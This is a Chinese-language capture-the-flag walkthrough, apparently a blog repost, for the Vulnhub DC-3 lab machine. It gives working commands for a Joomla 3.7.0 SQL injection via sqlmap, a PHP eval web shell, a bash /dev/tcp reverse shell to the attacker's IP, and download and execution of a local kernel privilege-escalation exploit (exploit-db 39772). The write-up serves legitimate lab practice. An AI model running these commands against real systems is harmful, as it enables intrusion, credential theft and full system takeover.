前往小程序,Get更优阅读体验!
立即前往
首页
学习
活动
专区
工具
TVP
发布
社区首页 >专栏 >【Vulnhub】DC-3

【Vulnhub】DC-3

作者头像
yichen
发布2020-04-16 17:20:06
6610
发布2020-04-16 17:20:06
举报
文章被收录于专栏:陈冠男的游戏人生

靶机分配不到 IP 问题:Vulnhub分配IP问题

这个靶机只有一个 flag 了,要 root 权限才能看

nmap 扫一波

ps.有个 whatweb 网站指纹扫描工具

还有个针对 Joomla 的扫描工具:joomscan --url http://192.168.149.157

搜一下:searchsploit Joomla 3.7.0

sqlmap 跑一下

最终的 sqlmap 命令

代码语言:javascript
复制
sqlmap -u "http://192.168.149.157/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent -D "joomladb" -T "#__users" -C name,password --dump -p list[fullordering]

把 password 的 hash 保存下来,使用 john 爆破,得到密码:snoopy

使用 admin/snoopy 登录

在这个地方写一句话

<?php @eval($_POST['yichen']); ?>

@是PHP提供的错误信息屏蔽专用符号

蚁剑连接一下

本地监听一个端口:nc -lvp 8888

终端里面执行:

bash -c 'bash -i &>/dev/tcp/192.168.149.141/8888 0>&1'

lsb_release -a 可以看到是 ubuntu 16.04

searchsploit ubuntu 16.04,大佬们说这个可以用

cat 一下,让去下这个东西:

代码语言:javascript
复制
wget https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/39772.zip

不知道为啥参考的文章评论区说这个 exp 没了,我是可以的呀

代码语言:javascript
复制
unzip 39772.zip  #解压 29772.zip 文件
cd 39772
tar -xvf exploit.tar  #解压 exploit 提权脚本 tar 包
cd ebpf_mapfd_doubleput_exploit

./compile.sh #执行脚本,编译文件

./doubleput #执行提权文件

在 /root 目录下存着 flag

这就叫脚本小子吗?爱了爱了

本文参与 腾讯云自媒体同步曝光计划,分享自微信公众号。
原始发表:2020-04-14,如有侵权请联系 cloudcommunity@tencent.com 删除

本文分享自 陈冠男的游戏人生 微信公众号,前往查看

如有侵权,请联系 cloudcommunity@tencent.com 删除。

本文参与 腾讯云自媒体同步曝光计划  ,欢迎热爱写作的你一起参与!

评论
登录后参与评论
0 条评论
热度
最新
推荐阅读
领券
问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档